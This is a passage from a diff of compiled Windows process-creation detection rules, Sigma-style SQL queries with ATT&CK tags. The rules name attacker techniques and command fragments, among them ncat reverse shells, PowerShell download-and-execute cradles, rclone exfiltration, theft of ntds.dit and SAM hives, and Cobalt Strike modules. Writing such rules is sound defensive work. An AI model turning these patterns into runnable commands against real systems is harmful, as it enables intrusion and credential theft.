Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 
'%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE 
'%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - 
"description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "status": "experimental", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.exfiltration", + "attack.t1567.002" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE 
'%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ - "attack.defense_evasion" 
+ "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine 
LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "status": "experimental", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. 
This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": 
"proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", - "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\revshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE 
'\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR 
CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Scripts or tools that download files and execute them" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine 